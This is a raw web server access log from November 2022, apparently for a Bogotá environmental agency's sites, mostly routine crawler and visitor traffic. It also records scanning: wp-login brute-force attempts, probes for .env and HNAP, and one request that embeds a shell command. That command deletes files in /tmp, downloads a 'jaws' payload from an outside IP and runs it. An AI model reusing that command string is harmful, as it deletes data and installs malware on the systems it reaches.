172.22.2.4 - - [04/Nov/2022:04:09:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:10:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [04/Nov/2022:04:12:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:04:13:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:16:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
40.77.167.66 - - [04/Nov/2022:04:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202022/3093.pdf HTTP/1.1" 200 535171
172.22.2.4 - - [04/Nov/2022:04:15:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.69 - - [04/Nov/2022:04:17:24 -0500] "GET /factores-internos-y-externos-influyen-en-la-calidad-del-aire-de-bogota.html HTTP/1.1" 304 -
201.245.192.253 - - [04/Nov/2022:04:17:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.97 - - [04/Nov/2022:04:17:30 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [04/Nov/2022:04:17:31 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [04/Nov/2022:04:16:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [04/Nov/2022:04:18:28 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.97 - - [04/Nov/2022:04:18:48 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [04/Nov/2022:04:18:49 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
64.124.8.47 - - [04/Nov/2022:04:20:23 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
201.245.192.253 - - [04/Nov/2022:04:21:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39762
201.245.192.253 - - [04/Nov/2022:04:21:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43524
186.29.254.232 - - [04/Nov/2022:04:21:24 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.29.254.232 - - [04/Nov/2022:04:21:35 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
186.29.254.232 - - [04/Nov/2022:04:21:37 -0500] "POST /appsia/controlador HTTP/1.1" 200 8511
188.214.106.179 - - [04/Nov/2022:04:21:39 -0500] "GET /vota-por-bogota-en-we-love-cities-pioneros-en-sostenibilidad.html HTTP/1.1" 200 850
188.214.106.179 - - [04/Nov/2022:04:21:57 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [04/Nov/2022:04:22:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
188.214.106.179 - - [04/Nov/2022:04:22:14 -0500] "GET /portaldeninos/contactanos/ HTTP/1.1" 200 88135
201.245.192.253 - - [04/Nov/2022:04:22:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:04:22:57 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
172.22.2.4 - - [04/Nov/2022:04:21:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:04:23:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:22:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
77.88.5.171 - - [04/Nov/2022:04:25:55 -0500] "-" 408 -
66.249.66.85 - - [04/Nov/2022:04:26:23 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:04:27:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:04:28:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:27:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:28:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [04/Nov/2022:04:31:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39762
201.245.192.253 - - [04/Nov/2022:04:31:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43524
201.245.192.253 - - [04/Nov/2022:04:32:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
66.249.66.85 - - [04/Nov/2022:04:32:40 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:04:33:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:33:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:34:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
77.88.5.173 - - [04/Nov/2022:04:37:03 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:04:37:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:04:38:28 -0500] "HEAD / HTTP/1.1" 200 -
103.41.145.110 - - [04/Nov/2022:04:40:33 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Nov/2022:04:39:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:04:41:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39762
201.245.192.253 - - [04/Nov/2022:04:41:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43524
172.22.2.4 - - [04/Nov/2022:04:39:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [04/Nov/2022:04:42:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
66.249.66.85 - - [04/Nov/2022:04:42:45 -0500] "-" 408 -
196.12.220.146 - - [04/Nov/2022:04:43:00 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [04/Nov/2022:04:43:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:44:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
93.158.161.71 - - [04/Nov/2022:04:47:03 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:04:47:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:04:45:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
172.22.2.4 - - [04/Nov/2022:04:47:55 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
216.245.221.92 - - [04/Nov/2022:04:48:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:04:52:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:04:50:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [04/Nov/2022:04:52:52 -0500] "-" 408 -
64.124.8.51 - - [04/Nov/2022:04:53:02 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/cronica-mujer-junio-29-junio-ambiente.png HTTP/1.1" 200 102849
172.22.2.4 - - [04/Nov/2022:04:51:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
139.28.158.2 - - [04/Nov/2022:04:53:14 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [04/Nov/2022:04:53:28 -0500] "HEAD / HTTP/1.1" 200 -
89.37.95.167 - - [04/Nov/2022:04:56:22 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.10.57.10/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
77.88.5.209 - - [04/Nov/2022:04:57:03 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:04:57:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:04:56:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:04:58:28 -0500] "HEAD / HTTP/1.1" 200 -
39.106.54.67 - - [04/Nov/2022:04:58:59 -0500] "GET /galeria/galeria/fotos/2humedal-Burro2P.jpg HTTP/1.1" 200 8996
172.22.2.4 - - [04/Nov/2022:04:57:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.66.85 - - [04/Nov/2022:04:59:29 -0500] "-" 408 -
64.124.8.53 - - [04/Nov/2022:05:00:20 -0500] "GET /portaldeninos/wp-content/uploads/2018/06/infantil-4-80x80.jpg HTTP/1.1" 200 2559
201.245.192.253 - - [04/Nov/2022:05:02:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:05:03:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:05:02:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:05:03:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
66.249.66.85 - - [04/Nov/2022:05:05:21 -0500] "-" 408 -
93.158.161.48 - - [04/Nov/2022:05:07:03 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:05:07:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:05:08:28 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.33 - - [04/Nov/2022:05:08:41 -0500] "GET /Publicaciones/2022EE82562.pdf HTTP/1.1" 404 227
193.142.146.35 - - [04/Nov/2022:05:09:39 -0500] "GET / HTTP/1.1" 200 319
193.142.146.35 - - [04/Nov/2022:05:09:39 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
172.22.2.4 - - [04/Nov/2022:05:08:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.46 - - [04/Nov/2022:05:10:07 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [04/Nov/2022:05:09:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
